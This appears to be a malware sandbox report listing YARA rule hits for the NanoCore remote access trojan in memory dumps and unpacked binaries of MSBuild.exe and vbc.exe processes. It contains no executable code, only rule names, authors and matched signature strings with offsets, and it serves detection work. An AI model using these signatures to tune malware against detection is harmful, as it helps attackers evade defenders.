00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
Process Memory Space: MSBuild.exe PID: 2544	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x20cb:$x1: NanoCore.ClientPluginHost 0x212c:$x2: IClientNetworkHost 0x7531:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x154a3:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: MSBuild.exe PID: 2544	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: MSBuild.exe PID: 2544	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1bd0:$a: NanoCore 0x1bec:$a: NanoCore 0x1d47:$a: NanoCore 0x1d56:$a: NanoCore 0x202f:$a: NanoCore 0x205b:$a: NanoCore 0x20cb:$a: NanoCore 0x11b0d:$a: NanoCore 0x11b1f:$a: NanoCore 0x11b5b:$a: NanoCore 0x1c77:$b: ClientPlugin 0x1da0:$b: ClientPlugin 0x2064:$b: ClientPlugin 0x20d4:$b: ClientPlugin 0x11b28:$b: ClientPlugin 0x11b64:$b: ClientPlugin 0x1eed:$c: ProjectData 0x11a5a:$c: ProjectData 0x3029:$d: DESCrypto 0x123b8:$d: DESCrypto 0xd3b6:$e: KeepAlive
Process Memory Space: MSBuild.exe PID: 2872	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x20cb:$x1: NanoCore.ClientPluginHost 0x212c:$x2: IClientNetworkHost 0x7531:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x154a3:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: MSBuild.exe PID: 2872	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: MSBuild.exe PID: 2872	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1bd0:$a: NanoCore 0x1bec:$a: NanoCore 0x1d47:$a: NanoCore 0x1d56:$a: NanoCore 0x202f:$a: NanoCore 0x205b:$a: NanoCore 0x20cb:$a: NanoCore 0x11b0d:$a: NanoCore 0x11b1f:$a: NanoCore 0x11b5b:$a: NanoCore 0x1c77:$b: ClientPlugin 0x1da0:$b: ClientPlugin 0x2064:$b: ClientPlugin 0x20d4:$b: ClientPlugin 0x11b28:$b: ClientPlugin 0x11b64:$b: ClientPlugin 0x1eed:$c: ProjectData 0x11a5a:$c: ProjectData 0x3029:$d: DESCrypto 0x123b8:$d: DESCrypto 0xd3b6:$e: KeepAlive
Process Memory Space: vbc.exe PID: 2780	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x113e4e:$x1: NanoCore.ClientPluginHost 0x113eaf:$x2: IClientNetworkHost 0x1192b4:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x127226:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: vbc.exe PID: 2780	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: vbc.exe PID: 2780	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x113953:$a: NanoCore 0x11396f:$a: NanoCore 0x113aca:$a: NanoCore 0x113ad9:$a: NanoCore 0x113db2:$a: NanoCore 0x113dde:$a: NanoCore 0x113e4e:$a: NanoCore 0x123890:$a: NanoCore 0x1238a2:$a: NanoCore 0x1238de:$a: NanoCore 0x1139fa:$b: ClientPlugin 0x113b23:$b: ClientPlugin 0x113de7:$b: ClientPlugin 0x113e57:$b: ClientPlugin 0x1238ab:$b: ClientPlugin 0x1238e7:$b: ClientPlugin 0x113c70:$c: ProjectData 0x1237dd:$c: ProjectData 0x114dac:$d: DESCrypto 0x12413b:$d: DESCrypto 0x11f139:$e: KeepAlive
Click to see the 134 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
24.2.vbc.exe.2760000.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
24.2.vbc.exe.2760000.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
24.2.vbc.exe.2760000.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
24.2.vbc.exe.2760000.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
20.2.vbc.exe.2760000.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
20.2.vbc.exe.2760000.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
20.2.vbc.exe.2760000.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
20.2.vbc.exe.2760000.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
8.2.vbc.exe.2860000.7.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
8.2.vbc.exe.2860000.7.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
8.2.vbc.exe.2860000.7.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
8.2.vbc.exe.2860000.7.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
6.2.vbc.exe.27a0000.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.2.vbc.exe.27a0000.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
6.2.vbc.exe.27a0000.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.vbc.exe.27a0000.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
18.2.vbc.exe.1e90000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
18.2.vbc.exe.1e90000.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
18.2.vbc.exe.1e90000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
18.2.vbc.exe.1e90000.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
28.2.vbc.exe.5f0000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
28.2.vbc.exe.5f0000.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
28.2.vbc.exe.5f0000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
28.2.vbc.exe.5f0000.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
32.2.vbc.exe.2870000.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
32.2.vbc.exe.2870000.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
32.2.vbc.exe.2870000.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
32.2.vbc.exe.2870000.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
14.2.vbc.exe.2750000.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.2.vbc.exe.2750000.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
14.2.vbc.exe.2750000.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.vbc.exe.2750000.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
26.2.vbc.exe.2750000.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
26.2.vbc.exe.2750000.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
26.2.vbc.exe.2750000.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
26.2.vbc.exe.2750000.6.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
22.2.vbc.exe.27c0000.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
22.2.vbc.exe.27c0000.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
22.2.vbc.exe.27c0000.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
22.2.vbc.exe.27c0000.6.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
23.2.MSBuild.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
23.2.MSBuild.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
23.2.MSBuild.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
23.2.MSBuild.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
13.2.MSBuild.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
13.2.MSBuild.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
13.2.MSBuild.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.MSBuild.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
22.2.vbc.exe.27c0000.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
22.2.vbc.exe.27c0000.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
22.2.vbc.exe.27c0000.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
22.2.vbc.exe.27c0000.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
6.2.vbc.exe.2830000.7.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.2.vbc.exe.2830000.7.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
6.2.vbc.exe.2830000.7.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.vbc.exe.2830000.7.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
5.2.MSBuild.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.2.MSBuild.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
5.2.MSBuild.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.MSBuild.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
